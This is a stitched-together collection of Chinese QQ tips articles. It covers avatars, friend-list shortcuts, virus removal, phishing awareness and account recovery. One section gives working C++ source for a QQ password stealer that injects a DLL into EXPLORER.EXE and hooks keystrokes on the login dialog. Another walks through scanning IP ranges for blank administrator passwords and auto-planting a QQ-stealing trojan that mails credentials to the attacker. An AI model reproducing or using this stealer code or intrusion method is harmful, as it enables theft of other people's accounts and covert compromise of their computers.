②单击系统选单中的“系统参数”命令,打开“参数设置”对话框,在该对话框中单击“声音设置”标签,在下面“声音选择”框中可以
对声音文件进行设置。
3、查找全部QQ昵称为空的用户
在“通过对方昵称”输入框中粘贴两个“Tab”键即可。
4、扮酷你的QQ头像}
你想让自己的头像更有个性、更美观吗?来,和我一起做!先来了解一下QQ头像的有关知识:QQ头像都存储在QQ所在目录的Newface文件夹
下,这些基本头像为32×32点阵大小、16位真彩色,以bmp的形式存放。每个头像都有三种状态(一张彩色,一张黑白,一张眨眼),所以准备3
张头像图片是必须的。
①首先选择一幅自己喜爱的图片,利用“画图”程序或其他图形处理软件将之转换成32×32×16格式,将它保存。同理,制作出黑白和眨
眼头像图片(这两个不做也可,不过,那样会使你的头像看起来只有一种状态)。
②进入Newface文件夹,找到目前代表你本人的头像,假设你使用的是“68-1”、“68-2”、“68-3”文件,把刚才准备好的头像文件重命
名为“68-1”、“68-2”、“68-3”(注意彩色的为“68-1”,黑白的为“68-3”,眨眼的为“68-2”),拷贝至Face文件夹中覆盖原文件即可
。
③启动QQ,鼠标右键单击QQ图标,选择“个人设定”,再单击“头像”向下的箭头,你就可以发现自己制作的头像已经存在于头像框中。
选中它,就可以将其作为自己的新头像,然后更新资料即可。
5、快速返回QQ“我的好友”用户首部
单击QQ“陌生人”组,然后单击QQ“我的好友”组。
6、快速找到“我的好友”中的指定用户
选择QQ为当前窗口,将当前正在使用的输入法转换成“英语”输入法,按你要找的用户昵称第一个字拼音的第一个字母键,若该用户的昵
称是英文字母开始,则直接按此字母键,若该用户的昵称是数字开始,则直接按此数字键,均按到找到该用户为止。
7、批量删除QQ“我的好友”用户
进入QQ“好友管理器”,按住“Ctrl”键,选定要删除的用户(若要删除连续的用户,则按住“Shift”键,单击其中的第一名用户和最后
一名用户),右击任意被选中的用户,单击“删除好友”。
8、清除QQ登陆对话框中QQ号码列表框中的号码
打开资源管理器,找到QQ所在目录,找到其中的dat文件夹,打开后可以看到一个QQ2000.cfg文件,删除这个文件。同时删除QQ目录下面不
属于你的号码的文件夹。连接上网,启动QQ,会出现注册向导,依次输入属于自己的QQ号码,进行注册,完成以后你就发现里面除了自己的号
码外,再也没有其他号码了,成功!
9、快速进入QQ聊天室的技巧
很多使用QQ聊天的朋友一定发现现在要想进入QQ聊天室里的某些房间是非常地困难了,常常是被告知“断开与服务器的连接!!! ”,在网
吧里上网都如此,更不要说是家里的“猫”了。哈哈,这里有个技巧,就是你想进入QQ聊天室时,先找一个在线人数少的房间进入,由于其在
线人数少,所以一次就能成功进入房间。然后再点击“服务器”按钮,换个你原本想进入的房间,你会发现能很轻松地一次就成功进入了。
10、在QQ组别里查找网友的技巧
我想每位使用QQ的朋友其“我的好友”组别里已经加入了很多的网友吧。尽管一些网友为了在“我的好友”组别里占有所谓的“眼球”效
应,常用的做法是在呢称前加上多个空格,但总还有排在最后面的,如要是我想消息给他们,难道是频繁的点击下拉箭头来实现吗?其实这里
有个很简单的方法,就是只需你记住对方的呢称,比如我需要查找的网友呢称是“格式化”,而“格”字的开头字母是“g”,只需按下“G”
键,你就会马上看到“格式化”的头像,哈哈,是不是真的很方便啊!不过需要注意的一点是,如果你的QQ是分了组别的话,那么就必须点击
某个组才能进行查找。
11、快速回复信息的技巧
有时给QQ上的好友回复信息,许久发不出,真急人。此时不妨按下Ctrl+Shift+Enter试试,可能会很快发送出去的 如何封别人QQ
很多朋友问我怎么限制用户使用QQ,今天专门测试了一下。
QQ服务器分为三类:
1、UDP 8000端口类13个:速度最快,服务器最多。
QQ上线会向这11个服务器发送UDP数据包,选择回复速度最快的一个作为连接服务器。
这6个服务器名字均以SZ开头,域后缀是tencent.com,域名与IP对应为
sz sz2 : 61.144.238.145 61.144.238.146 61.144.238.156
sz3 sz4 sz6 sz7 : 202.104.129.251 202.104.129.254 202.104.129.252 202.104.129.253
sz5 : 61.141.194.203
202.96.170.166 218.18.95.221 219.133.45.15
61.141.194.224
202.96.170.164
2、TCP HTTP连接服务器4个,使用HTTP 80 和443端口连接
这4个服务器名字均以tcpconn开头,域后缀是tencent.com,域名与IP对应为
tcpconn tcpconn3 218.17.209.23
tcpconn2 tcpconn4 218.18.95.153
61.141.194.227
218.18.95.171
3、会员VIP登陆服务器,使用HTTP 443安全连接
服务器IP 218.17.209.42
知道这些服务器地址,全封锁了就OK了,谁也不能上QQ了,无论何种方式,
如果可以上了,那么就是tencent增加了新的服务器,大家通知我一声,
再分析一次就可以找出新的服务器地址了。
除非QQ不发送数据,否则我就能分析出它的服务器地址。:) QQ盗号核心编程
平台:windows xp sp2;
软件:QQ2005版。
申明:本文旨在技术交流。
一。先讲几句废话:
经常有听到有朋友QQ被盗的消息,总感觉做出这种行为的人是可鄙的,不就是对QQ窗口进行监视,然后再是记录用户输入的号码和密码,认为
没什么了不起。
对于Windows核心编程,本人还是一只菜鸟,前一段时间把《Windows系统编程》粗略的看一边(当然重点地方仔细的看),由于对于C++有点基
础,感觉学起来比较容易上手。但到了这两天真正实践的时候,遇到了各种各样的问题。即使一个小小的问题都足以让我这只菜鸟郁闷老半天
。直到此时,在完成这个软件的时候,整理一下思路,不但算是给自己个总结,也跟像我一样的菜鸟们分享一下自己的经验。
二。进入主题:
想必大家都已经知道,这类软件的特点就是在用户不知不觉的时候工作。在任务管理器中是看不到它们的,这就是隐藏了进程。采用插入内核
的嵌入方式、利用远程插入线程技术、嵌入DLL线程、或挂接PSAPI等都可以达到效果,哎,既然是个菜鸟就选择一个最简单的来做个实验。
先讲一下思路:需要三个进程A,B,C;两个DLL。
初始进程A,用于在进程B中创建远程线程,创建成功立即退出,不会留给任务管理器任何捕捉它的机会(你根本来不及观察)。
进程B作为远程线程的寄主,选择的时候应该是那些系统中必须执行的进程,比如EXPLORER.EXE。其中的远程线程用于监视目标进程。
进程C为目标进程在这里也就是QQ.EXE。
第一个DLL(InspectQQLandDlg.dll),远程线程的载体。
第二个DLL(MyHook.dll),全局钩子函数的载体。
现在要做是利用进程A把InspectQQLandDlg.dll映射到进程B,同时启动该DLL中的远程线程,再利用该线程监视目标进程(QQ.EXE)QQ登陆窗口
,一旦找到,立即把MyHook.dll映射到目标进程来监视用户的输入。
这样也清楚了这个软件设计的总体构架,下面用代码来具体实现。
1。远程线程的创建。先利用进程快照取得目标进程,相对比较简单
HANDLE hSnapshot ;
hSnapshot = CreateToolhelp32Snapshot ( TH32CS_SNAPPROCESS, 0 ) ;
if ( hSnapshot == INVALID_HANDLE_VALUE)
{
return 0;
}
string lpName = "EXPLORER.EXE" ; //设定需要监视的进程名
PROCESSENTRY32 pe;
pe.dwSize = sizeof ( PROCESSENTRY32 );
for( BOOL fOk = Process32First ( hSnapshot, &pe ) ; fOk; fOk =
Process32Next( hSnapshot, &pe ) )
{
if ( pe.szExeFile == lpName )
{
//取得宿主进程(EXPLORER.EXE)的句柄
HANDLE hRemoteProcess = OpenProcess ( PROCESS_ALL_ACCESS,
false, pe.th32ProcessID ) ;
//取得目标DLL的当前路径(路径可自由设置)
char szInspectDllPath ;
GetCurrentDirectory ( 128, szInspectDllPath ) ;
strcat ( szInspectDllPath, "QQLandDlg.dll">\\debug\\InspectQQLandDlg.dll" ) ;
//申请存放文件名的空间
LPVOID pszInspectDllRemote ;
int InspectDllNameLength = sizeof ( szInspectDllPath ) + 1 ;
pszInspectDllRemote = VirtualAllocEx ( hRemoteProcess,
NULL, InspectDllNameLength, MEM_COMMIT, PAGE_READWRITE ) ;
//把dll文件名写入申请的空间
WriteProcessMemory ( hRemoteProcess, pszInspectDllRemote,
(LPVOID)szInspectDllPath, InspectDllNameLength, NULL);
//获取动态链接库函数地址
HMODULE hModule ;
hModule = GetModuleHandle ( "kernel32.DLL" ) ;
LPTHREAD_START_ROUTINE fnStartAddr ;
fnStartAddr = ( LPTHREAD_START_ROUTINE ) GetProcAddress ( hModule,
"LoadLibraryA" ) ;
//创建远程线程
HANDLE hInspectRemoteThread = NULL ;//存放远程线程句柄
hInspectRemoteThread = CreateRemoteThread ( hRemoteProcess, NULL, 0,
fnStartAddr, pszInspectDllRemote, 0, NULL ) ;
if( hSnapshot != NULL )
CloseHandle ( hSnapshot ) ;//关闭进程快照
CloseHandle ( hRemoteProcess ) ;
break ;
}
}
2。此时InspectQQLandDlg.DLL已经被映射到EXPLORER.EXE。此时在InspectQQLandDlg.DLL的DllMain(千万不要写成DLLMain)接受到
DLL_PROCESS_ATTACH消息,但一般来说不因在DllMain中执行过多的功能(借鉴前人的经验,嘿嘿),于是很容易想到开辟一个新线程。
switch(fdwReason)
{
case DLL_PROCESS_ATTACH:
{
//下面这句会给你创建远程线程成功的提示。
MessageBox ( 0, "Code Injection success!", "NOTE", MB_OK ) ;
HANDLE hNewThread = CreateThread ( NULL, 0,ThreadForInspect, NULL, 0, 0 ) ;
break;
}
}
在新线程中要达到的目标只是一个循环,利用while()和循环标志(BOOL)isContinue即可以实现。
在这个远程线程中要完成的第二个任务是找到QQ登陆对话框中关键控件。
关于这点网上有很多资料,利用的是FindWindow和FindWindowEx,这是针对以前的版本。在这里已经无效了,现在QQ在这里下了点工夫,采用
的是窗口标题采用随机字符。
就以登陆对话框为例,对话框的类为"#32770",或许许多菜鸟朋友会像我在最初的时候一样,傻傻用FindWindow ("QQ用户登陆","#32770") ;结
果什么都没有,哎~~
其实可以通过窗口枚举搞清楚QQ在这里到底做了什么手脚。
BOOL CALLBACK EnumWindowProc ( HWND hwnd, LPARAM lParam )
{
if ( !hwnd )
{
return false ;
}
char szWindowName ;
ZeroMemory ( szWindowName, 128 ) ;
GetClassName ( hwnd, szWindowClassName, 128 ) ;//取得类名
if ( !strcmp ( szWindowClassName, "#32770" ) )
{
__asm int 3
}
return true ;
}
利用上面的程序段,在VC调试器中不断按F5且同时在WATCH中观察szWindowName,很容易发现这个窗口名字符串是由不超过二十个字符组成(多
次观察),但其中的元素只有0X13,0X10,0X32,字符串中的每个位置都是三个元素之一。但在SPY++中窗口名中看起来只不过是“ ”,怎么
看都只是几个空格(再提醒一下,不要试图通过复制其中的内容,效果可是无法忍受的,呵呵)
事实上登陆窗口可以通过窗口的许多确定因素来确定,比如窗口风格,窗口ID之类的,这些都可以通过SPY++轻易得到(SPY++,好东西啊),
下面也就不多发话了,直接给出各个关键控件的代码。
#define UserNameComboBoxId 0x0000008A //用户名控件ID
#define PasswordEditId 0x000000B4 //密码控件ID
#define ButtonId 0x00003EA0 //登陆按扭控件ID
#define QQLandDlgMiniStyle 0x94CA00C4 //登陆对话框最小化时的风格
#define QQLandDlgShowStyle 0XB4CA00C4 //登陆对话框在桌面显示时的风格
BOOL CALLBACK EnumWindowProc ( HWND hwnd, LPARAM lParam )
{
if ( !hwnd )
return false ;
long style = GetWindowLong ( hwnd, GWL_STYLE ) ;
if ( style == QQLandDlgMiniStyle || style == QQLandDlgShowStyle )
{
hQQLand = hwnd ;
EnumChildWindows ( hQQLand, EnumChildWndProc, NULL ) ;
return false ;
}
return true ;
}
BOOL CALLBACK EnumChildWndProc ( HWND hwnd, LPARAM lParam )
{
if ( !hwnd )
return false ;
//取得指定句柄的控件ID
long id= GetWindowLong ( hwnd, GWL_ID ) ;
if (id == UserNameComboBoxId )
{
hUserName = hwnd ;
}
else if ( id == PasswordEditId )
{
hPassword = hwnd ;
}
else if ( id == ButtonId )
{
hLandButton = hwnd ;
}
return true ;
}
到这里终于取得盼望多时的hUserName,hPassword,hButton这三个控件的句柄。~v~
在这里其实可以用
SendMessage ( hUserName, WM_GETTEXT, 128, (LPARAM)szUserName );
取得UserName(QQ号码),但不能取得密码。
可以随便下载个*号密码,再在密码框中输入几个字符,结果可能是失败,不知道QQ做了什么手脚,有机会再好好研究。既然此路不通,菜鸟也
自己的办法去达到目标。
现在远程线程的第二个功能(取得关键控件的句柄)已经完成,接下来要做的事是把MyHook.dll映射到QQ.EXE,这样即可实现对用户键盘输入
的监视。
只需调用MyHook.dll的接口函数即可
SetHook ( hQQLand, hUserName, hPassword, hLandButton, true ) ;
3。MyHook.dll模块。
EXPORT BOOL WINAPI SetHook ( HWND hQQLand,
HWND hUserName, HWND hPassword, HWND hLandButton, BOOL isInstall )
{
if ( isInstall )
{
hQQLandDlg = hQQLand ;
hUserNameEdit = hUserName ;
hPasswordComboBox = hPassword ;
hButton = hLandButton ;
DWORD dwQQLandDlgThreadId = GetWindowThreadProcessId ( hQQLand, NULL ) ;
hHookDll = GetModuleHandle ( "MyHook" ) ;
hKeyboard = SetWindowsHookEx ( WH_KEYBOARD,
(HOOKPROC)KeyboardProc, hHookDll, dwQQLandDlgThreadId ) ;
hWndProc = SetWindowsHookEx ( WH_CALLWNDPROC,
(HOOKPROC)CallWndProc, hHookDll, dwQQLandDlgThreadId ) ;
if ( hKeyboard != NULL && hWndProc != NULL )
return true ;
}
else
{
UnhookWindowsHookEx ( hKeyboard ) ;
UnhookWindowsHookEx ( hWndProc ) ;
hHookDll = NULL ;
hKeyboard = NULL ;
hWndProc = NULL ;
ZeroMemory ( szPassword, 128 ) ;
pszPasswordLen = 0 ;
}
return false ;
}
这个程序段很简单只是通过检测远程线程的输入安装、卸载钩子函数。
如果对钩子函数不清楚的朋友,看一下MSDN或者WIN32函数集就可以了。
这里对QQ登陆对话框线程设置两个钩子,一个键盘钩子函数记录键盘输入;另一个全局消息钩子。
LRESULT CALLBACK KeyboardProc ( int nCode, WPARAM wParam, LPARAM lParam )
{
//检测回车键是否被按下
if ( wParam == VK_RETURN && lParam > 0 )
{
//由于钩子函数只是记录对密码框的记录,因而在最后时刻取得号码会是准确的
SendMessage ( hUserNameEdit, WM_GETTEXT, 128, (LPARAM)szUserName );
//此处可以自由处理拦截到的号码和密码(szUserName,szPassword)
//不要忘了变量还原(szUserName,szPassword)
}
if ( lParam > 0 && wParam != VK_RETURN )
{
char KeyName ;
ZeroMemory ( KeyName, 10 ) ;
GetKeyNameText ( lParam, KeyName, 10 ) ;
if ( strlen ( KeyName ) == 1 )
{
strcat ( szPassword, KeyName ) ;
}
}
return CallNextHookEx ( hKeyboard, nCode, wParam, lParam ) ;
}
也由一部分用户是用鼠标点击登陆按扭的,可由下面代码实现
LRESULT CALLBACK CallWndProc ( int nCode, WPARAM wParam, LPARAM lParam )
{
CWPSTRUCT *p = (CWPSTRUCT*)lParam ;
if ( p->message == WM_COMMAND && p->hwnd == hButton )
{//同理
SendMessage ( hUserNameEdit, WM_GETTEXT, 128, (LPARAM)szUserName );
//这里可添加如何处理密码的语句
}
return CallNextHookEx ( hWndProc, nCode, wParam, lParam ) ;
}
上面给出的几段代码可以实现基本的号码和密码记录功能,但对于具体细节的处理(比如用户按退格键或是其他),这些只要考虑仔细就可以
了没有什么难度,这里就不说了。 QQ号码丢了不用着急 一步一步找回来
一、怎样知道QQ被盗
1、正在上QQ,突然收到提示:“您的QQ已在别处上线”。说明有人正在盗你的QQ。
2、登录时提示密码不正确,重试N次也不行。说明你的QQ已经被盗。
二、有密码保护该怎么办
让他偷吧,去腾讯客服重设密码就可以了。
三、 没有密码保护或忘了密码保护的设置该怎么办
1、2秒钟内重新上线,抢在盗号者前面修改密码,并重新登录。
2、尽快去腾讯客服网站(可以点这里去)填写号码申诉表,让腾讯把QQ还给你。
有密码保护的朋友不一定就能顺利地找回密码,如果您如果当初注册的安全邮箱已失效(重新设定的密码会以邮件的方式发给你),或暂
时无法接收并打开重设密码的确认邮件(比如网络不通),那你可以临时修改安全邮箱。
如果去填写了号码申请表,不管有没有通过腾讯的审核,它都会通过客户端消息或邮件的方式通知您申诉处理结果。您也可以自己去查询
审核的结果。
丢了QQ密码再来找很麻烦,不如采取措施来尽量避免QQ被盗带来的麻烦。
建议一:
立即申请QQ密码保护功能。这样就能一万个放心,不怕QQ被偷。
建议二:
了解老网友给大家介绍的《QQ密码窃取伎俩剖析与防盗策略》在平时的使用过程中引起充分注意。
建议三:
最新版的QQ2005增加了安全中心功能,可以有效防止您的QQ被盗。
建议四:
不要再挂机了。腾讯早就修改了升级方法,挂机已经没有多大意义,成为历史了。通过挂机把密码丢了倒是很容易。
建议五:
不要相信所谓充Q币、送Q币的广告,天下没有白吃的午餐。贪便宜就可能会失去你心爱的QQ号。 三招教你识别QQ活动真伪
时下网络上冒出了很多所谓的挂级网站,送Q币网站,,让人真假不分,良莠不辨,难道天下真有 这等掉馅饼的好事,真的有活雷锋式的网站愿意
白白送钱给我们 吗?从来没有白吃的午餐,网站用意何在,不言而喻。那如何辨别 网上的QQ活动是真是假?就让我们来擦亮你的眼睛吧。
一、观察网址
腾讯公司举办的正规活动的网址通常都是 “http://***.qq.com/***”。反之,如果该网址貌似 “http://qq.***.com”又或者
“http://***.qq**.com”,则 千万不要上当了
二、QQ系统消息
腾讯公司的大型活动都会先通过系统消息对公众宣传,同时还附有该活动地址,所以如果大家得到的活动地址与QQ系统宣传地址不符,就
不要冒然访问那个活动网址。
三、官方网站找答案
得到一个QQ活动网址后,不妨直奔QQ官方网站www.qq.com去查看一下在官 方网站是否有相关介绍,并登陆自己的账号(如
QQshow:http://show.qq.com/),然后再次打开你得到的活动网 址,正常情况下,该网页就已经自动登录了,如果仍提示输入 QQ账号密码,那
极有可能又是一个盗号的网站。
PS:尤其是最后一招,个人推荐使用~~ 在QQ中将自己从对方好友中删除
在QQ中将自己从对方好友中删除
经常用QQ聊天,是不是有这样的尴尬:允许了别人将自己加为了好友,可相处时间一长后悔了,真希望自己能从对方的好友栏里消失。怎么办
呢?难道要求对方删除自己,显然不妥,就让我们神不知鬼不觉地神秘蒸发吧!
点击QQ的“菜单→一键切换到TM”(可以在TM里直接登录),然后在自己的好友里找到对方,在其头像上点击右键,选择“将自己从对方联系人
名单中删除”在随后出现的“警告”对话框里,选择“是”就搞定了。 你的QQ可能是这样丢失的
一.行动:
2.1.准备工具:
2.1.1.扫空密码的工具:
这里可以列出很多,如:流光,x-scan,scanipc等
这里特别推荐用scanipc啦,这个工具不错,可能同步种植你要放进肉鸡的木马。
http://www.20cn.net/cgi-bin/download/down.cgi
这里可以得到!测试版好象比正式版还好。感觉罢了。
2.1.2.偷qq的软件:
也有很多的,我这里选择QQ杀手6.8.
http://xinxinyi.yeah.net
这里可以得到。
2.1.3.申请一个免费的邮箱。
你不是想就用自己的用着的吧!随你啦,不怕死就用啦
我还是建议新申请一个来接收肉鸡上发回来的qq和密码。
2.2.得到一个ip段:
方法还是很多:
2.2.1.你可以装个能看ip的qq。
得到一个qq上的人的ip,比如你得到qq上的人的ip是211.98.106.3 好,记下先,呆会有用。
2.2.2.也可以查找自己的ip,开始--运行--cmd--ipconfig。
2.2.3.用搜索 ip 。还会没有吗?
2.3.扫描同步植入:
2.3.1.添写ip段:
打开scanipc添上一个从上面或者那里都行得到的ip,比如是211.98.106.3。
那么你可以在ip那里 。
开始行添:211.98.106.1 结束行添:211.98.106.255 这是一个c类,你想多点,就自己添加啦!
2.3.2.添写同步种植:
2.3.2.1配置qq杀手:
先看看他的说明。
打开资料设置文件--Qqset.exe,不会设置,看看设置范例。
好了配置好了就确定,之后生成一个Msread.dt.
在运行专用捆绑工具--QQbin.exe 来捆绑哪个新生成Msread.dt文件。
捆绑成功后生成SHOWGOOD文件。这个是用于远程种植的.
2.3.2.2.回到scanipc在木马那里:
浏览,找到刚才配置后得到的SHOWGOOD文件,同时勾上同步植入
好了,都做好了,现在可以扫描了!多扫几个网段的.得到空密码的并自动种植木马。
累了,玩其他的拉,不过你得到了空密码也可以玩其他的东西。这么不说啦!
2.4查看邮箱
一段时间后,查看邮箱啦!是不是有不少收获,别玩太多,积积德。你都玩啊?告诉你我没玩过,这个是思路那是又写出来?我前言说了,想
让你明白自己的qq也可以这样轻易就被别人偷了。
二.安全措施
3.1.空密码:
此中最大给人利用的地方是administrator没密码,或者其他用户是空密码。
3.2.弱密码
有弱密码,弱密码就是很容易给人猜到的密码,有什么比123 /456/0/1 等密码简单呢!
3.3.好的密码
数字+字母+特殊符号
例如:n1,。
这个密码随短,如果你想暴力破解。ok,你慢慢跑吧
3.4.安装放火墙吧!
这个最简单,下载个天网,默认设置都可以让你安全的啦! 清除QQ尾巴病毒
昨天晚上不知道谁动了我的机器,今天早上起来和朋友聊天,朋友说,你给我发的什么呀,“好好mv”是什么东西呀。晕,脑子里第一个概念
就是 QQ尾巴病毒。就对我朋友说是QQ病毒,(她说你也会中毒? 我......)我清除病毒的常用方法就是先用杀毒软件,然后再手动清理,因
为我不相信杀毒软件,我机器上装了四种不同的杀毒软件(瑞星、卡巴、诺顿、江民),不是为了杀毒,是为了做测试来让自己的毒免杀。所
以说鬼才相信杀毒软件。自己动手、丰衣足食嘛。但首先要开杀毒件杀杀。
打开瑞星,正准备杀呢,瑞星自动关闭了。我晕,挺NB的。其他的杀毒软件不试了,手动和他玩。
一般的木马病毒开机都会自动启动,他们会把自己放在系统里的启动项里面,我们可以从机器的启动项来找到病毒,再清除他。启动项 注册表
五个、C:\WINNT 两个、程序→启动,这个地球人都知道。
system.ini和win.ini 这两个正常。
程序→启动 这里面也是啥都没有,正常。
下面看看注册表项里面,病毒一般都是藏在这里面,咱把他揪出来。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
一共六个键值:
internet 数据:"C:\WINNT\system\smss.exe" 这是系统的,纳闷 系统的smss.exe进程是无法删除的,但这个启动项里里smss.exe是不应该的
,不管他,先删除。
RavTask 数据:"C:\Program Files\Rising\Rav\RavTask.exe" -system 这是瑞星的。
SonudMan 数据:"C:\WINNT\system32\WNILOGON.exe" 这个没见过,病毒的。删(和winlogon长的差不多,还怪会伪装呢。)
Synchronization Manager 数据:mobsync.exe /logon 这个是系统内部的,留着。
TkBellExe "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot 这是播放器的。
Update C:\Program Files\Common Files\UPDATE\Update.exe 这是DBC数据库的。
总结:以上的启动键值,一般的木马和病毒都是藏在这里的,你可以根据后面的数值数据的路径来找他的地址然后删除,在这个注册表项里面
除了Synchronization Manager 这个别删,其他的可以全删,不影响系统正常运行。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
键值 ClientQyule 数值数据 C:\Program Files\Qyule\qyule.exe (这是个啥东西,没见过,删)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
这个里面什么都没有。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
键值 internat.exe 键值 ServUTrayIcon (我的Serv-U)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce\
键值 ClientQyule 数值数据 C:\Program Files\Qyule\qyule.exe (同上面HKEY_LOCAL_MACHINE里面是一样的,也删)
在找 C:\WINNT\system32\WNILOGON.exe 这个东西的时候,无意中在C:\WINNT 下发现了我QQ发给别人的东西 超好看得动画、超女录像、给你
看看这本书、好好mv、看看我的照片、这些文件。。。晕死,啥都不说,先删。。。找到 WNILOGON.exe 删除,失败,找WNILOGON.exe进程,
然后结束进程再删,晕,也失败,进程不让结束,文件也不让删,郁闷。百度搜搜 “强制结束进程的工具” ,然后用工具结束进程,然后删
除WNILOGON.exe文件。删除了以后,我的瑞星就可以用了。就是这个东西搞的鬼。这个不是网游或QQ木马,如果是,我非要找到他的邮箱帐号
密码不可。
好,一切搞定,然后上QQ聊天。结果证明没有那破尾巴了。。
最后告诉大家一个小窍门:在清理病毒的时候,要在“文件夹选项”→“查看”→ 隐藏受保护的操作系统文件前的勾去掉,显示所有的文件和
文件夹选中。还有就是 查看文件的时候,点“排列
手图标”→“按日期”。这样对你找那些可疑文件特别有用处。 设置磁盘读写权限 彻底封杀QQ的各种广告
相信使用QQ的聊友都使用过“珊瑚虫”等外挂程序来避免腾讯无聊的广告骚扰吧。如果你用的是Windows XP操作系统,利用磁盘读写权限便可
将QQ广告彻底封杀于无形中,并且还可自定义QQ的广告呢。
第一步:腾讯QQ一般安装在“C:/ProgramFiles/Tencent/QQ”文件目录中,在资源管理器中打开此目录,首先双击进入“AD”文件夹,按
下“Ctrl+A”全选所有文件,再按下“Shift+Delete”彻底删除所有广告。在空白处右击,选择执行“属性”命令。
第二步:单击“安全”标签,如图,在“组或用户名称”中选择用户并点击下文的“删除”按钮,将所有用户删除;或者,将所有用户的权
限都设置成“拒绝”,并且单击“高级”按钮,清除勾选“从父项继承那些可以应用到子对象的权限项目,包括那些在此明确定义的项目”,
随后会出现“安全”对话框,选择“删除”按钮便可,最后确定退出。
这样,QQ程序就无法将下载的广告存放到我们的硬盘,而彻底消失了。
提示:如果在你的操作系统文件夹属性中没有找到“安全”标签,执行“控制面板→管理工具→本地安全策略”,打开“本地策略→安全
选项”,在右侧窗口中找到“网络访问,本地账户的共享和安全模式”项,双击将其更改为:“经典-本地用户以自己的身份验证”。
第三步:将自己喜欢的LOGO标志做成一个“230×30”像素的GIF图片,命名为“ad.gif”另存到腾讯QQ安装目录下的“DAT”文件夹中,如
果提示已经有同名文件则覆盖之。OK,现在打开你的QQ,找到一好友开聊吧,既没有广告骚扰,又可以看到自己制作的LOGO,酷! Q好友想将你删除?休想!
大家知道,如果你的QQ 好友不再认为你是“好友”而将你“拉黑”(即拉入黑名单),则你发送的任何 QQ 消息都将会石沉大海,并且你在下
次重新登录 QQ 时,对方的头像图标也将会在你的好友列表中消失。其实,对方删不删你是对方的自由,而你同不同意对方删你则是你的自由
。如果你不愿对方删你,则你可以通过下面的方法迫使对方将你重新加人。首先从 QQ 的“系统消息”记录中找到对方好友请求你通过身份验
证的那则系统消息记录,然后双击,在接下来弹出的“系统消息”对话框中分别单击“通过验证”和“加为好友”按钮,则你的 QQ 头像图标
又会不知不觉地出现在对方好友列表中了。怎么样?是不是挺绝的?对方说不定还正在纳闷呢! 教你填写有说服力的QQ号友申诉资料
很多人号码申诉时都如实的填写了自己相关真实的证明资料,却老是申诉被拒绝,其中很大的原因是填写资料时提供的证明资料没有足够说服
力(特别是号码申诉的“其他证明资料”,我想这个问题一定困扰很多人,怎样填写一些只有你本人知道而别人无法得知的资料,这样的资料才
更有说服力。),现我把我的一些申诉的具体方法和大家交流一下:
一、被盗号码QQ资料、历史密码、历史好友、用户个人身份资料、原有密码保护资料等,这些资料只要填写半年前就可以了。若原有密码
保护或证件号码忘了,就直接在申诉表里注明“忘记了”
二、其他证明资料的填写(16个别人无法知道或很难知道的证明资料):
1、该号码何处申请(如:声讯台、网站、QQ客户端或手机申请等。如果是会员或QQ行用户顺便写上支付方式。)
2、该号码是否用手机绑定过(有的话就填上曾经绑定过的手机号码)
3、QQ游戏(如:你是否用过QQ游戏里面的双倍积分卡等游戏道具)
4、如果忘了原始密码,就填写个申请旧密码保护时的密码,并注明是申请旧密码保护时的密码(当然,这个要在你记得的前提下,如果不
记的可以不填)
5、是否赠送过别人QQ秀或某些腾讯的业务,有的话填上并注明获赠人的QQ号码(当然,这里最好能填3个月前的,因为盗号者可以用你密码
在QQ帐户里查到你最近3个月Q币消费记录,填早的更有说服力)
6、你的网络硬盘密码、通讯录密码、QQ帐户密码。(这些密码也很有说服力,我想若不是号码的主人,就不大可能知道这些了吧。除非你
把那些密码设的和你QQ密码一样)
7、如果你是会员,你还可以填写你QQ的客服电话的VIP服务密码。
8、该号码是否做过会员,有的话填上大体的时间。在会员服务期间是否克隆过好友,从哪个号码克隆的好友(如果有,这个也是个很好的
证明)
9、是否向哪个群或QQ游戏家族捐献过Q币(有的话,还要填写群号码或家族名称)
10、是否获得别人赠送的QQ秀或腾讯的一些服务。
11、提供你QQ曾用过的昵称(要是号码是你的,以前的昵称总知道吧,要是不完全记的完整的昵称,至少也要提供以前昵称部分“文字”)
12、有QQ宠物的可以填写自己宠物领取的方式(如:七夕情侣宠物蛋活动、银行卡支付、好友赠送的或曾经赠送给哪些好友宠物等)
13、是否用QQ梦想地带的积分换过奖品或某些增值服务(有的话写清兑换的奖品送于何人或是自己使用)
14、是否申请过蓝钻、红钻、黄钻等业务,并写上这些服务的获得方式和时间(如Q帐户支付、手机支付、积分兑换或好友赠送的以及服
务开通的大致时间)
15、是否上传过聊天记录(这些腾讯公司就有存档的,是十足的证明资料)
16、如果你是会员的话,是否参加过会员活动。
还有一点重要的------就是大家能申请尽量多申请些业务(大家可能说那需要很多QB,其实免费的也很多)这样申诉的时候就有更多的资料可写。